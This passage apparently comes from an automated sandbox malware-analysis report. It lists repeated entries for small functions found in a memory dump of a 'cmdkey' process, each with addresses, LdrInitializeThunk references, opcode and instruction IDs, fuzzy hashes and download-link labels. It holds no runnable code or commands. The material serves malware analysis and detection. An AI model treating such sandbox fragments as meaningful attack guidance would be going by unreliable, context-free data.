                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: da55a4ba1f9357de7a765920bc9167dc8ba317bd003448c5098057f18c2a2dc9
                                                                                      • Instruction ID: 19f39011e6718b769e9887804bedad39910891689a5a4e68059558a5235636e8
                                                                                      • Opcode Fuzzy Hash: da55a4ba1f9357de7a765920bc9167dc8ba317bd003448c5098057f18c2a2dc9
                                                                                      • Instruction Fuzzy Hash: 2B90023121104813E511A1584744707000997E4241F91C81AA0425598DD7768952B131
                                                                                      Function 031B2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7d7c84363032190da934aae0f0ff2a69334c211309d586d4b6ad17297395ad45
                                                                                      • Instruction ID: d3cadbd9f1c2e05f25c67caf6029f418db7bb871d75e39bf620c98c5c143b15c
                                                                                      • Opcode Fuzzy Hash: 7d7c84363032190da934aae0f0ff2a69334c211309d586d4b6ad17297395ad45
                                                                                      • Instruction Fuzzy Hash: 8290022161104903E501B1584644616000A97E4241F91C42AA1025595ECB358992B131
                                                                                      Function 031B2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 147 31b2c30-31b2c3c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d6b80416e77fe12c3cac9a59c9f1b7026a37bedbbbf2319472ff90939d1a0ae1
                                                                                      • Instruction ID: f3457ca7df50139ad28bef0c6c21e3c09e5bdc635e8efdd3652135f95b4cdf13
                                                                                      • Opcode Fuzzy Hash: d6b80416e77fe12c3cac9a59c9f1b7026a37bedbbbf2319472ff90939d1a0ae1
                                                                                      • Instruction Fuzzy Hash: 4C90022922304403E580B158564860A000597E5202F91D81DA0016598CCB3588696331
                                                                                      Function 031B2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 148 31b2c50-31b2c5c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: cef7d37b2e23ee7038301491df5c362537f2c80c904ba8ab91e22ae6c42943f1
                                                                                      • Instruction ID: 2030f59d20d7db7edd35063d3bb366e470d490ca06f4d0fdf002c55d80e07365
                                                                                      • Opcode Fuzzy Hash: cef7d37b2e23ee7038301491df5c362537f2c80c904ba8ab91e22ae6c42943f1
                                                                                      • Instruction Fuzzy Hash: 5890022131104403E540B15856586064005E7F5301F51D419E0415594CDB3588566232
                                                                                      Function 031B2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 149 31b2cf0-31b2cfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ea62989ef09e520c310c3b335eb97fca0bdeea3accc827f4e935a592d6ffbd4c
                                                                                      • Instruction ID: 0e426b5a83042bee97e945451135a1860d01b501747bdf362039a8f1d7bb1f25
                                                                                      • Opcode Fuzzy Hash: ea62989ef09e520c310c3b335eb97fca0bdeea3accc827f4e935a592d6ffbd4c
                                                                                      • Instruction Fuzzy Hash: BF900221252085536945F15846445074006A7F4241791C41AA1415990CC7369856E631
                                                                                      Function 031B34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 924e27066ceb58df27d1e6aab2220682ef7956ec7c9733ceef4daaaa54c8d2e6
                                                                                      • Instruction ID: de8d0fc6caba6b08062c9439521336de33466208cd10ccc501b9c073fa6f6c0d
                                                                                      • Opcode Fuzzy Hash: 924e27066ceb58df27d1e6aab2220682ef7956ec7c9733ceef4daaaa54c8d2e6
                                                                                      • Instruction Fuzzy Hash: D990023161514803E500A1584754706100597E4201F61C819A04255A8DC7B5895175B2
                                                                                      Function 031B38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 589c5a5543dd4bf82b3964aaee6cb75824ade9682926aa9cbe2cc5e027bc207e
                                                                                      • Instruction ID: cb655661517580e19d38ade03e0aee9c640c13e7a2c9bb7d30266afc93ecc12d
                                                                                      • Opcode Fuzzy Hash: 589c5a5543dd4bf82b3964aaee6cb75824ade9682926aa9cbe2cc5e027bc207e
                                                                                      • Instruction Fuzzy Hash: 1790022125509503E550B15C46446164005B7F4201F51C429A08155D4DC77588557231
                                                                                      Function 031B2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 134 31b2b2a-31b2b2f 135 31b2b3f-31b2b46 LdrInitializeThunk 134->135 136 31b2b31-31b2b38 134->136
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 993a69545dc8a8b382bd9f78431ade56210372ef2185b13c9d8c6c2160867dde
                                                                                      • Instruction ID: 6ddb4d8692c3fd00f1c47bc8da5757ea2218c51ac79c5051d1161f4608e53baf
                                                                                      • Opcode Fuzzy Hash: 993a69545dc8a8b382bd9f78431ade56210372ef2185b13c9d8c6c2160867dde
                                                                                      • Instruction Fuzzy Hash: 57B09B719014C5C7EA11D7604748717791477D4701F15C455D1470681E8738C095F175